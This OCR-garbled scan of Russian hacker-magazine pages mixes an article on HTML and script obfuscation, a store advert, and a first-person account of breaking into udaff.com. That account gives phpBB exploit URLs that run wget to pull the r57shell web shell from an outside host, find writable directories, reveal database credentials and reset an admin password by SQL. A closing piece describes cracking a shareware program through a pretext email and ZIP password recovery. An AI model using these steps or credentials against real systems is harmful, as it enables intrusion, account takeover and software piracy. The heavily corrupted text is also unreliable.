08;.&#1 20;a&#1 07;&#1 01 ;&#1 1 2;.&#1 1 4;&#1 1 7; 
”>Форб</а> 

Теперь даже у самого сильного робота случится инфаркт, а его хо- 
зяин будет очень долго расшифровывать тайные рукописи в логах 
граббера. Шучу :). В наше время есть умные пауки, которые рас- 
шифровывают уникод на лету. Но не все так плохо, поскольку этот 
способ не является единственным и неповторимым. Для более 
жесткого кодирования адреса обратимся за помощью к ^ѵаВсгірІ 

<ІіеасІ> 

<1Ше>Защита от спама<ДШе> 

<5сгір1 Іапдиаде=\1аѵаЗсгірГ> 

Іипсііоп етаіі (Іодіп, сіотаіп) 

{ 

таіі = Іодіп + + сіотаіп; 

сіоситепі.мііе (таіі); 

} 

</5СГІрЬ 

</ІіеасІ> 

<ЬосІу> 

Е-таіі: 

<5сгірЬетаіІ("ІогЬ","геаІ.хакер.ги");</5сгірЬ 
</ЬосІу> 

Вот очень простая и совершенная защита, которую 
вряд ли осилит спамерский робот. Думаю, идея те- 
бе понятна: при необходимости печати емейла, за- 
пускается функция плаіІ(), которой передается имя 



ПРОГРАММНЫЙ РАЙ 

Легко понять, что весь НТМІ_-контент можно защитить опреде- 
ленным кодированием, при котором тело документа некоторым 
образом криптуется, а перед отображением пользователю рас- 
шифровывается при помощи «загрузчика», написанного на 
ЗаѵаЗсгірІ. Все это может быть дополнительным образом пере- 
мешано и запутанно, чтобы разобраться в месеве странных сим- 
волов было нереально. Само собой, программисты уже создали 
множество софтин, делающие всю эту работу за тебя. Каждая 
из программ имеет свои плюсы и минусы, поэтому из большого 
ассортимента тулз я выбрал всего три, возможности которых 
сейчас и опишу. 

1 Епсгурі НТМІ_ Рго ( ѵѵѵѵѵѵ.Іі 1 тІраззѵѵогб.сот/боѵѵпІоаб/епсІір. 2 ір Ѵ 
Довольно простая и функциональная программа Епсгурі НТМ1_ Рго 
позволяет зашифровать целиком всю или определенную часть 
НТМІ_-страницы. После запуска софтинки необходимо скормить 
ей один или несколько файлов (шаг Рііез), затем выбрать область 
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ВЗЛОМ ///// І551ІЕ 




^р>АГСОИ К НОПКЕ 



Я не могу устоять перед самым распространенным 
приемом защиты НТМЬ-страницы. Это блокирова- 
ние правой кнопкой мыши. Не знаю, почему его со ^ 
датели верят в его эффективность, поскольку, на мои 
взгляд, защитить он может разве что от самых зеле- 
ных новичков. А вот собственно и скрипт, препят- 
ствующий нажатию кнопки грызуна. 

< 8 СКІРТ кшдиауе=] аѵаЗсгіро 
йлпсгіоп с 1 іск(е) И (сіоситспг.аіі) 

|ік (еѵепГ.ЬиИоп == 2 ) 
і а 1 егг( те& 5 а§е ) ;гсшт іаізе; | ) 

[{' ( сіос итепс .Іауеге ) {іГ (е.ѵѵКісІі == 3 ) 

{геппп Гаке;})} 

^^^ П сарш^^ѵепй(Еуепі:.Мои5еВо\уп);} 

сіоситеп1:.оптои8есІолѵп=с1іск; 

</ 8 СКІРТ> 

Думаю понятно, что обойти такую защиту можн 
выбором опции «Просмотр в виде НТМЪ» в разделе 
«Вид» или нажатием соответствующей кнопки на 
обычной клавиатуре. Существует еще один способ 
против воров НТМЬ- дизайна. Знатоки советуют ис- 
пользовать Іаѵа-вызов \уіпбо\ѵ.ореп(ІІКЬ) вкупе со 
скриптом, блокирующим правую кнопку. При этом 
единственная возможность добраться до исходника 

нажатие горячей клавиши либо спец-кнопки на 

клавиатуре. Это, по мнению аналитиков, может ввес- 
ти людей в ступор. Но я считаю, что подобные прие- 
мы подействуют разве что против новичков. 



шифрования (секция <ЬосІу>, вся страница, линки, е-таіГы и т.п.). 
После этого стоит уделить внимание ЗаѵаЗсгірІ-вкпадкам, кото- 
рые позволяют запретить нажатие правой кнопки, запрет печати 
страницы и т.п. И на финальном шаге ты получишь зашифрован- 
ную НТМІ_-страничку. Все, конечно, здорово, но у программы есть 
два минуса. Во-первых, за нее просят аж 30 зеленых президентов, 
а во-вторых, размер НТМІ_-страницы увеличивается в 5 раз. Зато, 
как обещают производители шифровщика, любой браузер смо- 
жет корректно отобразить закриптованный НТМЬ. 

2 НТМЬ Роѵѵег ( ѵѵѵѵѵѵ.риІІзоіксот/НТМІ-Роѵѵег ЗЕТУР.ехе ). Соз- 
датели этого продукта назвали НТМЬ Роѵѵег средством комп- 
лексной защиты сайта. На самом деле возможности програм- 
мы мало отличаются от софтины Епсгурі НТМІ_. Разве что 
вкладками, которые расположены не вертикально, а горизон- 
тально :). Впрочем, три отличия мне все же удалось найти. Раз- 
мер зашифрованной паги меньше того, который выдавал кон- 
курент НТМ1_ Роѵѵег — всего в 3 раза больше исходного. Так 
же можно заметить вкладку Меіа Тадз, в которой указываются 
тэги, не требующие шифрования. Скажем, записал ты в НТМ1_ 
конструкцию <М>Я крутой хакер</М> и захотел, чтобы в ис- 
ходниках страницы эта надпись рисовалась чистым текстом. 
Следовательно, во вкладку следует добавить два тэга 
<М></М> и эффект, как говорится, будет достигнут :). Кста- 
ти, полезно пропускать тэги <1ШехДШе>, чтобы поисковые 
роботы успешно индексировали страницу. 

И еще один приятный момент. В программе есть возможность 
установить пароль на зашифрованный файл. Впоследствии 
можно восстановить исходный текст по этому паролю, выбрав 
соответствующую опцию во вкладке ЕпсгурІ Тадз. 

Программа, естественно, просит денег, однако спасительные 
крэки лежат на соответствующих сайтах и ждут момента актива- 
ции. Но я тебе про это ничего не говорил :) 

3 НТМЬ Ргоіесіог ( ИДр://атззоІіТіІеЬигз1.сот/ИітІрго1ес1ог.7ір ). 
Казалось бы, программа похожа на уже описанные продукты, 
однако я счел нужным описать возможности НТМІ_ Ргоіесіог’а. 
Помимо всего прочего, софтина умеет защищать изображения. 
Здесь предлагается несколько методов. Программа может раз- 
резать рисунок на несколько частей, тем самым предотвращая 
его скачивание. Так же можно сконвертировать картинку в тип 
зѵѵТ, что вызовет некоторый ступор у посетителя (но наверняка 
только у новичков). И самый излюбленный метод защиты — до- 




На компакте ты найдешь все продукты, описанные в этой статье, а также 
бонус в виде трех программ, защищающих НТМЬ и АЗР-контент. 



Рекомендую почитать несколько методов зашиты кода на 
странице: ѵѵѵѵѵѵ.каѵкагсііаі.сот/агсЫѵе/ігкіех.рбрЛ-1 6344.ііітІ. 
Здесь основное внимание акцентируется на защите изображений, 
поэтому будет невредно ознакомиться со статьей. 



бавление водяного знака и трейдмарка на изображение с задан- 
ной прозрачностью. Помимо всего прочего, Ргоіесіог может на- 
ложить посторонний рисунок на все изображения. Подобный 
шедевр вряд ли будут использовать на других источниках. Есте- 
ственно, во вкладке Іпри* требуется загрузить весь ѴѴѴѴѴѴ-сайт, 
включая рисунки. 

СЛОВО О СКРИПТАХ 

Вот ты и научился защищать свои ѵѵеЬ-проекты, е-таіі адреса и 
изображения. Однако существует еще одна опасность — кража 
скриптов. Представь, что у тебя есть виртуальный сервак, где ты по- 
казываешь миру свой новый РНР-движок, который два года писал с 
напарником и в котором реализовал кучу наворотов и сложных фи- 
шек. Само собой, ты всерьез опасаешься, что какой-нибудь хакер- 
обдолбыш просто поломает твой сервант и упрет дорогие сорцы. 
Специально для тебя программисты 2епсІ, которые, кроме всего 
прочего, занимаются разработкой ядра РНР, создали систему 
2епб Епсобег, которая может изготовить из любого рИр-скрипта 
бинарный файл, выполненный при помощи 2епб Оріітігег. Эта 
связка уже давным-давно стала стандартом для коммерческих 
приложений и активно используется. При этом система доста- 
точно надежна, стабильна, и ей доверяют самые дорогие скрип- 
ты и программы. Единственный минус — использование системы 
стоит денег. Поэтому для нас с тобой она не слишком подходит. 
Мы воспользуемся другим здоровым решением — софтиной 
рбр_зсгеѵѵ. РИр_зсгеѵѵ без проблем скручивается рИр_тосГом и 
прекрасно шифрует любые сценарии. АрасИе без труда распоз- 
нает непонятные исходники, и даже если взломщик стащит у те- 
бя структуру движка, то восстановить ему исходный код будет 
очень сложно. 

Давай потренируемся и поставим софтинку на сервер. В первую 
очередь скачиваем рИр_зсгеѵѵ ( Иі1р://ргбоуѵпІоабз.зоигсеІогае.пе1/ 
рНр-зсгеѵѵ/рНр зсгеѵѵ-1 .3.1а т. ) и конфигурим программу. Затем слег- 
ка изменим длины ключей кодирования в файле рИр_зсгеѵѵ.Н. Прос- 
то поменяй 5 чисел на любые значения, чтобы твои ключи не были 
дефолтными. После этого можно собирать прогу командой таке. 
Теперь начинается самое интересное. Скопируй готовый модуль 
рНр_зсгеѵѵ.зо в каталог, где находится рбр (у меня это /изг/ІІЬ/рІір4). 
После этого добавь строчку «ехІепзіоп=рНр_зсгеѵѵ.зо» в файл 
ріір.іпі (он находится там же). И напоследок перезапусти АрасИе. 
С этой минуты ѵѵеЬ-сервер может понимать зашифрованный 
программой рНр-код. Осталось только сгенерировать парочку 
сложных сценариев :). Это делается командой «зсгеѵѵ /путь/к/ка- 
талогу/скриптов». Но помни, что бинарник зсгеѵѵ нужно предва- 
рительно собрать запросом таке в директории Іооіз. Все зако- 
дированные скрипты будут созданы в этом же каталоге, а ори- 
гиналы запишутся под именем зсгірі.ріір. зсгеѵѵ. 

Я проверил эту штуку на своем сервере, и она мне очень понра- 
вилась. Правда, у меня пока нет необходимости шифроваться, так 
как на моем сайте я не держу ничего кроме публичного форума 
ѵВиІеІіп. Но я уверен, что у тебя есть проекты покруче борды :). 

ЗАЩИТИ СЕБЯ САМ! 

Вот и вся пища к размышлению. Ты можешь прямо сейчас скачать софт 
и полностью защитить свой сайт, а также все рНр-сценарии. Однако луч- 
ше не торопиться и подумать о продуктивности защиты. С одной сторо- 
ны, никто не спионерит у тебя твою «собственность», а с другой — сов- 
сем необязательно шифровать весь код, ведь это приведет к увеличению 
размера страниц в 7 — 1 0 раз. Разумнее будет защитить отдельные участ- 
ки кода и важные изображения, которые могут быть интересны другим, 
менее удачливым ѵѵеЬ-дизайнерам. 

ВШАКѴ ѴОІЖ’5 ~і~ 
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Открой для себя 

новую 

реальность 



Репііит'4 НТ 

іпзіде™ 



Благодаря компьютеру Ріехігоп ѴІР 
на базе процессора Іпіеі® Репііит® 4 
с технологией НТ Вы сможете 
насладиться реалистичными 
компьютерными играми. 



САЛОНЫ-МАГАЗИНЫ: СЕРВИС-ЦЕНТР: 

ст.м. "Бабушкинская", ул. Сухонская, 7А (095)105-6447 ст.м. "Бабушкинская", ул. Молодцова, 1 (095)105-6447 

ст.м."Улица 1905 года", ул.Мантулинская, 2 . . .(095)105-6445 ФОТО ИНТЕРНЕТ КАФЕ: 

ст.м.'Ъладыкино", Алтуфьевское ш., 16 (095)105-6442 ст.м.'Бладыкино", Алтуфьевское ш., 16 (095)105-6441 




3000 наименований товаров Самый выгодный кредит за 15 мин. Время работы: 10-20, без выходных Бесплат- 
ная доставка* Удобная автостоянка Резервирование товара через интернет Пункт обмена валюты Оплата кре- 
дитными картами Подарки покупателям Соответствие стандартам Техническая поддержка Магазин аксессуа- 
ров Магазин компьютерной литературы Обучающий курс для работы на ПК в комплекте 

* полную информацию о товарах и услугах в конкретных магазинах компании «Ф-Центр» уточняйте на сайте МѴМѴ ѴѴ.'ТСбП'ІбГ.ГІІ 



Іпіеі, логотип Іпіеі, Іпіеі Іпзісіе, логотип Іпіеі Іпзісіе, Іпіеі Сепігіпо, логотип Іпіеі Сепігіпо, Сеіегоп, Іпіеі Хеоп, Іпіеі ЗреесіЗІер, Ііапіит, Репііит и Репііит III Хеоп являются товарными знаками или заре- 
гистрированными товарными знаками корпорации Іпіеі и ее подразделений в США и других странах. 




интернет-магазин 




ѵѵѵѵѵѵЛсепіег.ги 






Новое Фото-Интернет кафе уже открыто! На базе компьютеров РЬЕХТНОЫ. 

Фото 10x15=5 руб., чашка кофе=35 руб., Интернет=50 руб. 
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ІІ СЕЙЧАС ВЫРОСЛО ЦЕЛОЕ ПОКОЛЕНИЕ ИНТЕРНЕТ-БАКЛАНОВ, ТУСУЮЩИХСЯ НА УРАЕЕ.СОМ. ПОЛОВИНА ИЗ КОТОРЫХ — 
ПЕРВЫЕНАХ, А ДРУГИЕ ЖЖУТ И ПИСШУТ ЕСЧЕ. РЕБЯТ ТАКИХ РЕАЛЬНО МНОГО. НЕДАВНО ВОТ НАМ НАПИСАЛ ЧУВАК, КОТОРЫЙ 
ДОЛГО И УПОРНО СЛАЛ РЕДАКТОРАМ ЦРАЕЕ.СОМ СВОИ КРЕАТИВЫ, НО ЭТИ СВОЛОЧИ ВЗЯЛИ И ЗАИГНОРИЛИ ПАРНЯ. ТОГДА 
НАШ ГЕРОЙ НЕ ОБЛОМАЛСЯ: ОН ОЧЕНЬ ОБИДЕЛСЯ И РЕШИЛ ПОЛОМАТЬ САЙТ УДАВА. Щ Щ 



ТЕХТ МАО / МАС@ѴѴАРР.ПІІ / 



жжом 

АВТОР/ 



ТУПЫЕ БАГИ 
И ИСТОРИЯ 
ВЗЛОМА 
ЦРАРР.СОМ 




ОТ ПЕРВОГО ЛИДА 

При первом взгляде на формат ссылок на сайте (например, 
Нйр://исІа1Тсот/сгео/51 377. ЫтІ) стало понятно, что движок использует 
тосІ_геѵѵгіІе ѵѵеЬ-сервера АрасГіе. Действительно, глупо было предпо- 
лагать, что на сервере в папках хранится куча НітІ-файлов :). Это не 
есть гуд, нельзя в параметры, передаваемые скрипту, ставить кавыч- 
ку и прочие нехорошие символы. Тогда я стал изучать альтернатив- 
ные проекты Удава, ссылки на которые присутствуют на главной стра- 
нице. Первым делом я попал на ІійрѴ/пеѵѵз.исІай.сот . Здесь уже не ис- 
пользовался мод^рерайт. Это уже лучше. Можно поиграть с парамет- 
рами. Я перешел по ссылке на новость НДрѴ/пеѵѵз.исІаіі.сот/ 
іпс!ех.рІір?са1=ѵоѵ2&пеѵѵз=1 . подставив в параметр пеѵѵз=Т кавычку. 
Система выдала мне ошибку: 

ѴѴагпіпд: То ре п ( п е\л/з/ѵоѵ2/1 '): ТаіІесІ Іо ореп зігеат: N 0 эисГі Іііе ог 
сІігесТогу іп /Ііоте/ийаІТ.сот/пеѵѵз/пеѵѵз.исіаІТ.сот/пеѵѵз.рІір оп Ііпе 3 

Не могу открыть файл. 

ПАДОНКИ ЖЖУТ 

Вау! Эта ошибка должна позволить нам прочитать любые файлы 
на системе! Что я и сделал, перейдя по такой ссылке: 
НДр://пеѵѵ5.ибаіТсот/іпбех.рІпр?са1=..&пеѵѵ5=іпсІех.рІпр 
Здесь саі-каталог, пеѵѵз-файл. На эту ссылку скрипт выплюнул 
мне страницу, где имелось следующее: 

$саІпатез = аггау ("іпсісІепТз" => "Проишэствия", "роМТіс" => 
"Политека'у "есопотіс" => "Иканомека", "оЬзсезІѵо" => "Обсче- 
ство", "Іесіі" => "Ноука и техника", "тесііс" => "Медецына", "зроіі" 
=> "Спорт", "паіиге" => "Прерода", "герогТз" => "Рипартажы", 
"ѵоѵ2" => "ВОВ 2", "зІиіІіеЬпауа" => "Служебная"); :: 

и штук 15 таких ошибок: 

ѴѴагпіпд: зТгізТг(): Етріу беіітііег. іп 
/Гіоте/исІаТТ.сот/пеѵѵз/пеѵѵз.исІаТТ.сот/пеѵѵз.рГір оп Ііпе 152 



То есть скрипт читал почему-то только первые п-символы из фай- 
ла. Поэкспериментировав еще с несколькими файлами, я понял, 
что тут делать нечего. Тогда я пошел дальше. Следующим объектом 
для изучения стал ННр://іІазН.исІаЛ.сот . Здесь можно скачать падо- 
начьи флешки со страницы ННрѴ/іІазН.исІаіі.сот/ іпсІаЛазГікі.рГір . И 
вот что мы получим, подставив в параметр ісі кавычку: 

ѴѴагпіпд: таіп(ГіеасІег , .іпс): ТаіІесІ Іо ореп зігеат: N 0 зисГі ТМе 
ог сІігесТогу іп /Иоте/исІаТТ.сот/ТІазГі/ГіТтІ/ТІазГіка.рГір оп Ііпе 96 

ѴѴагпіпд: таіп(): РаіІесІ орепіпд Феабег'.іпс' Іог іпсіизіоп 
(іпсIисIе_раТ^^= , .:/из^/з^^а^е/рГ|р:/из^/5ГIа^е/реа^ , ) іп 
/Гіоте/исІаТТ.сот/ТІазГі/ГіТтІ/ТІазГіка.рГір оп Ііпе 96 

Тут можно поиграть с инклудом, вставив в конце ссылки символ 
конца строки %00, например, перейдя на НДрУЛІазН.ибаЛ.сот/ ІІазИ- 
ка.рНр?іб=.ЛІазНка.рНр%00 . мы получим такую ошибку: 

ѴѴагпіпд: таіп(ГіеасІег.ДІазГіка.рГір): ТаіІесІ Іо ореп зігеат: N 0 зисГі 
ТМе ог бігесіогу іп /Иотѳ/исІаЛ.сотЛІазГі/ГіІтІЛІазГіка.рГір оп Ііпе 96 

Опять нам это ничего особого не даст. Я пытался, но ничего хо- 
рошего заинклудить не удалось. Тут я уже начал злиться и зарядил 
в гугл следующий запрос для поиска: 

іпигІ:"исіаТТ.сот" ТМеТуре:рГір 

МОРОЗНОЕ СОЛНЦЕ 

Любимый поисковик выдал здоровую кучу ЛИНКОВ. Побродив по 
ним, я наткнулся на один интересный сайт: ИДр://зипІгее 2 .ибаЛ.сот 
( ГіДрѴ/резсІес.сот ). А интересен он был тем, что на нем установле- 
на нюка со старой (2.0.8) версией популярного форума рНрВВ. 
Все, наверно, знают знаменитую дырку с НідИІідГіГпараметром во 
всех версиях этого форума до 2.0.10 включительно, которую я не- 
замедлительно и начал использовать :). Первым делом я выяснил, 
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первый баг на пеѵѵз.исІаТС.сот 
оказался не самым опасным 



I список директорий, открытых для записи ■■ используем ѵѵеЬ-шелл для изучения 
‘ “ ’™ В II внутренностей сервера 




вот они, пароли к базе данных! 



список баз данных на сервере. Их дофига Ц внутри админки исіаіі.сот 




есть ли на серваке ѵѵдеі, запросив следующий адрес: 



рЬрРдАсІтіп, который находился по адресу: 




Шр://5ипІгее2.исіаІІ.сот/тос]иІе5.р[ір?пате=Рогит5&ІіІе=ѵіе\л/ 

Іоріс&Ы08&ЫдЫідііЬ%2527.$ро8Іег='$[іега'.%2527&[іега=\А/ 

ЫсІі%20\А/деІ 

ѴѴдеІ на сервере был (/изг/Ып/ѵѵдеі), но теперь нужна была директо- 
рия, открытая для записи, куда можно было бы залить более удоб- 
ный ѵѵеЬ-шелл. Для поиска таковой я воспользовался утилитой ТіпсІ: 

ИНр:// 8 ипІгее 2 .исІаІІ.сот/тосІиІе 8 .р[ір?пате=Рогит 8 &ІіІе=ѵіе\А/ 
Іоріс&Ы08&ЫдЫід[іІ=%2527.$ро8Іег='$[іега'.%2527&[іега=-[і 
псі ./ Іуре сі -регт 0777 -І8 

Таких директорий оказалось три: даІІегу/аІЬитз, даІІегу/аІЬитз/есИі 
и даІІегу/аІЬитз/изегрісз. Оставалось только залить удобный веб- 
шелл, что я и сделал, в качестве готового решения использовав 
хваленый г57зЬеІІ. Выполнив команду 

ііНр:// 8 ипІгее 2 .исІаІІ.сот/тосІиІе 8 .р[ір?пате=Рогит 8 &ІіІе=ѵіе\л/ 

Іоріс&Ы08&ЫдЫідііІ=%2527.$ро8Іег=%60$[іега%60.%2527& 

Пега=\л/деІ%20- 

0%20./даІІегу/аІЬит8/и8егріс8/и8ег?іІе8.р[ір%20[іІІр://г8Іѵоісі.г 

и/с]ошІоай/г578ііеІІ.М, 



/Иоте/8іІе8/ре8СІес.сот/[іІтІ/даІІегу/аІЬит8/и8егріс8/и8ег8/сопІ 

/сопТід.іпс.рИр 

Я изменил только следующие параметры: 

$сопТ[ , 8е^ѵе^8 , ][0][ , сIе8С , ] = ’рздГ; 

ЗсопІІ'зегѵегз'РП'ІіозТ] = 'рздГ; 
$сопТ[ , 8е^ѵе^8 , ][0][ , сIеТаиI1:сIЬ , ] = 'исІаТТ'; 

Теперь можно было залогиниваться на наш рд-сервак с полу- 
ченными ранее логином и паролем, что я тут же и проделал. 
Скрипт выдал мне кучу баз данных, но мне нужна была только 
одна — ибаІІ :). Так как рЬрРдАсІтіп не позволяет прямо в бра- 
узере просматривать структуру баз данных, то я начал сливать 
дамп этой базы. Дойдя до места, где были строки: 

ІЫЗЕВТ ІЫТО га_іі8ѲГ8 ѴАЫІЕЗ (1, 'ргоіогд', 

'32261 39Т7е09е6с29Т9Тс9520асТ209Ь І , 'ргоІогд@таІоІеІка.ги', 
’ргоТогд 1 , "); 

ІЫЗЕРТ ІІМТО га_изег8 ѴАЫІЕЗ (2, 'ѵаікоп', 

'32261 39Т7е09е6с29Т9Тс9520асТ209Ь' , 'ѵаікоп@ісІЬИ.ги ' , 

'ѵаікоп 1 , "); 



я получил полноценный ѵѵеЬ-шелл по адресу: 
ЬНрѴ/зипігеег.ибаіі.сот/ааІІегѵ/аІЬитз/изегрісз/изегііІез.рЬр . 
Посмотрев на используемую систему и демоны, я понял, что про- 
эксплойтить систему вряд ли удастся, так как я еще не видел пуб- 
личных сплоитов под установленные сервисы, да І_іпих 2.6.13.3 
на тот момент даже локально не пробивался. Поэтому я поставил 
себе основной задачей проникновение в админку Удава. Чем и 
занялся дальше. 



я остановился, так как видел запросы к этой таблице в файле, ко- 
торый отвечал за авторизацию в админке :). Нового пользовате- 
ля в админку я добавлять не стал, а всего лишь соорудил неболь- 
шой скрипт со следующим содержанием: 

<? 

ргіпі тсІ5('1 2345'); 

?> 



САМ СЕБЕ ПРОФОРГ 

Сначала путем нехитрых логических рассуждений я вычислил ди- 
ректорию, где находился основной сайт (/ІіотеМѵѵѵѵ/исІаН.сот/), 
далее, просмотрев листинг файлов и каталогов, можно понять, 
что админка находится в асіт/, а параметры подключения к базе 
данных, которые нам и надо узнать, — в файлике кегпеі.іпі.ріір. 
Открыв его, я увидел следующее: 

т 

Іуре = "рдзді"; 

іізег = "ргоТогд"; 

ра88\л/огсІ = "РодОп]іі[іауд8"; 

ро П = 5433; 

І108І = "рзді"; 

сіЬ = "исІаТГ; 

Хе-хе, здесь используется постгрес, а у меня на ноуте как раз ва- 
лялся рЬрРдАбтіп, который я и залил в уже известную папку, 
доступную для записи. 

Перейдя по ссылке Ыір://зипІгее 2 .ибаІІ.сот/ааІІегѵ/аІЬитз/изег- 
рісз/изегз . я увидел форму для логина. Но, чтобы все заработало, 
сначала надо было настроить конфигурационный файл 



Сценарий, успешно выполнившись, выдал мне тбб-хэш строки 12345. 
Далее последовал следующий запрос к базе данных: 

ІІРОАТЕ га_іі8ѲГ8 5ЕТ 

ра88\л/сІ='827ссЬ0ееа8а706с4с34а1 6891Т84е7Ь' ѴѴНЕВЕ 
Іодіп='ргоТогд' 

Этим запросом мы установили пароль 12345 админу ргоіогд :). 
Думаю, теперь можно наведаться в админку по адресу: 
Ыір://ибаІІ.сот/абт . После успешного входа в админку с логином 
ргоіогд и паролем 12345, я, чтобы не палиться, вернул профоргу 
старый пароль запросом: 

ІІРОАТЕ га_изег8 ЗЕТ 

ра88\л/сІ=' 32261 39Т7е09е6с29Т9Тс9520асТ209Ь' ѴѴНЕВЕ 
Іодіп='ргоТогд' 

админ им УДАФФ 

Поскольку у меня уже были админские куки, я принялся активно 
изучать админский интерфейс. Надо заметить, что куки на Удаве 
не привязываются к конкретному айпишнику, то есть можно спо- 
койно сидеть под админом, и никто ничего не заметит. На этом я 
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ТЕХТ АРА / АКА@СКАСКІ_АВ.КІІ / 

НЕВИДИМАЯ 

ВОЙНА 

СПАСУТ ЛИ КРИПТОАЛГОРИТМЫ ПРОГРАММЫ ОТ ВЗЛОМА? 

ІІНЕ СЕКРЕТ, ЧТО ПРОИЗВОДИТЕЛИ ПРОГРАММНОГО ОБЕСПЕЧЕНИЯ ВО ВСЕМ МИРЕ СТРЕМЯТСЯ МАКСИМАЛЬНО 
НАДЕЖНО ЗАЩИТИТЬ СВОЮ ПРОДУКЦИЮ ОТ РАЗЛИЧНЫХ ВИДОВ ВЗЛОМА. В НАСТОЯЩЕЕ ВРЕМЯ ОГРОМНУЮ ПОПУ- 
ЛЯРНОСТЬ ПРИОБРЕЛИ НАВЕСНЫЕ ЗАЩИТЫ В ВИДЕ РАЗЛИЧНЫХ ПРОТЕКТОРОВ. ПРИНЦИПЫ ИХ РАБОТЫ ИЗУЧЕНЫ 
ВДОЛЬ И ПОПЕРЕК ЕЩЕ С МОМЕНТА ВОЗНИКНОВЕНИЯ, И С ВЫХОДОМ КАЖДОЙ НОВОЙ ВЕРСИИ МОМЕНТАЛЬНО ПО- 
ЯВЛЯЮТСЯ МАНУАЛЫ ПО ИХ ВЗЛОМУ. КОММЕРЧЕСКИЕ ПРОТЕКТОРЫ СТОЯТ ДОВОЛЬНО МНОГО И ИЗ-ЗА ЭТОГО НЕ- 
ДОСТУПНЫ ПРОГРАММИСТУ-ОДИНОЧКЕ. ПОЭТОМУ ЕМУ ПРИХОДИТСЯ, КРОМЕ РАЗРАБОТКИ СОБСТВЕННО ПРОДУК- 
ТА, ЗАНИМАТЬСЯ И ЕГО ЗАЩИТОЙ. НО ДЛЯ СОЗДАНИЯ КАЧЕСТВЕННОЙ ЗАЩИТЫ НЕОБХОДИМО ИМЕТЬ ХОТЯ БЫ БА- 
ЗОВОЕ ПРЕДСТАВЛЕНИЕ О МЕТОДАХ ВЗЛОМА ПРОГРАММ, ИНСТРУМЕНТАХ, СПОСОБАХ ПРОТИВОДЕЙСТВИЯ, ОТЛАД- 
КЕ И ТАК ДАЛЕЕ. В ЭТОЙ СТАТЬЕ МНЕ ХОТЕЛОСЬ БЫ РАССМОТРЕТЬ НА ПРИМЕРЕ ОДНОЙ ПРОГРАММЫ ТИПИЧНЫЕ 
ОШИБКИ БОЛЬШИНСТВА ПРОГРАММИСТОВ ПРИ РАЗРАБОТКЕ ЗАЩИТЫ СВОИХ ПРОДУКТОВ 

НАДЕЖНЫ ЛИ ДЕМОВЕРСИИ? 

Исследовать мы будем программу Андрея Кононова Сігсиіі Мадіс — 
комплекс для расчета электрических цепей постоянного и пере- 
менного тока в общем виде. Именно ее попросили взломать на од- 
ном из форумов, посвященных взлому и защите программ — 

СгаскІ_@Ь. По работе программы ничего сказать было нельзя: при 
клике на любую иконку выскакивало назойливое сообщение, что в 
демоверсии эта опция недоступна. На первый взгляд — стандарт- 
ная демонстрационная версия, основные функции заблокированы. 

Но в меню присутствует пункт «Регистрация», при попытке вызвать 
которую программа просто закрывается. Возможно, автор просто 
забыл его удалить, а может, оставил намеренно, пытаясь запутать 
потенциального взломщика. Нам остается только гадать. 

Подумаем, как же создают демоверсии? Если рассудить логичес- 
ки, то в большинстве случаев демоверсия есть ни что иное, как 
полная версия, только самые основные опции из программы уда- 
ляются и заменяются на различные напоминания о регистрации. 

Это в идеале (для разработчика). На практике попадаются и такие 
«шедевры», в которых все нужное остается на месте, а напомина- 
ния просто добавляются к основной программе в обход вызовов 
нужных процедур. Безусловно, взломщику не составит особого 
труда это обнаружить и путем подмены (патча) нескольких байт 
легким движением руки превратить демку в полнофункциональ- 
ный продукт. Но с этой программой такой фокус не прошел — 
настоящая демо, функции вырезаны, так что практического инте- 
реса не представляет. Что ж, будем пытаться достать ІиІІ-версию. 

КАПЕЛЬКА СОЦИАЛЬНОЙ ИНЖЕНЕРИИ 

Где можно взять полную версию программы? Например, найти в 
Интернете, в сетях Е-Эопкеу или у автора :). Естественно, где-ни- 
будь скачать полную версию не удалось — слишком специфичес- 
кая программа, да и вообще сомневаюсь я, что кто-то ее покупал 
и потом решил поделиться со всеми. Остается сам автор. Посове- 
щавшись, было решено сыграть на пресловутом пункте «Регист- 
рация» в меню. Автору было направлено письмо следующего со- 
держания (стиль и орфография автора письма сохранены): 

«Здравствуйте! Скачал Вашу демо Сігсиіі Мадіс — понравилась. 

Хочу купить, но что-то не понял ничего: нажимаю регистрация, а 
программа аварийно закрывается. Куда же я введу регистраци- 
онный код? С уважением, Александр.» 



Ответ не заставил себя долго ждать. Так как он довольно большой по 
объему (на половину статьи), приводить тут я его не буду, остановимся 
лишь на основных моментах. Самое главное — это фраза «...Перед 
оплатой скачайте архив коммерческой версии программы с адреса 
Архив защищен паролем. Пароль для распаковки архива со- 
общается сразу после получения подтверждения оплаты». Ну и да- 
лее, собственно, про регистрацию — отослать автору код компьюте- 
ра, сгенерированный программой регистрации, и получить ответный 
лицензионный код. Не кажется вам, что слишком закручено? Сперва 
оплатить программу, получить пароль на архив. Разархивировав, по- 
лучить код и только потом автор вышлет ответный. Ну что ж, все рав- 
но эти пересылки ключей, денег и паролей не для нас, так как у нас 
есть полная версия. 

ГДЕ ИСКАТЬ ПАРОЛИ 2ІР? 

Для восстановления забытых паролей к архивам существует до- 
вольно много утилит. Наверное, самые известные из них — это 
продукты от компании ЕІсотЗоЙ, специализирующейся на вытас- 
кивании паролей из всего, куда они были введены ранее. Мы бу- 
дем пользоваться пакетом РаззѵѵогсІ Кіі Епіегргізе ѵ7.0, который 
содержит довольно много различных утилит для подбора паро- 
лей, в том числе и для архивов 2ІР. Попутно следует отметить, что 
подбор паролей к архивам 7.1Р зачастую является не таким уж и 
долгим, как к примеру к аналогичному архиву РАР. А уникальная 
возможность Зиге2ір и вообще делает подобную защиту легко 
преодолимой. К сожалению, она работает только с версиями 
ѴѴіп2ір 8.1 и ниже, да к тому же файлов в архиве должно быть не 
меньше пяти. Но нас это как раз устраивает: файлов у нас много, 
а так как программа старовата, то явно она была запакована нуж- 
ной нам версией. Запускаем утилиту 2ірКеу, выбираем Зыге2ір в 
опциях, указываем наш архив и идем пить чай с бутербродами. 
Дальше будет интереснее. Через несколько минут пароль найден. 

ИССЛЕДОВАНИЕ ПРОГРАММЫ 

Архив распакован, можно спокойно устанавливать программу. 
Теперь программа не запускается вообще. Зато появился новый 
файлик — гедст.ехе. Это и есть файл регистрации, сделан столь 
топорно, что сразу наталкивает на мысль о спешке, в которой ав- 
тор делал регистрацию. На рисунке можно оценить этот шедев- 
ральное творение. 
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в левой части код — ДО запуска программы, в правой — ПОСЛЕ 




Все в точности, как и писал автор. Генерируется «код вашей ЭВМ», 
который нужно отослать автору, в ответ надо ввести присланный 
код. Мы вводим любые цифры, но сообщений никаких не выдается. 
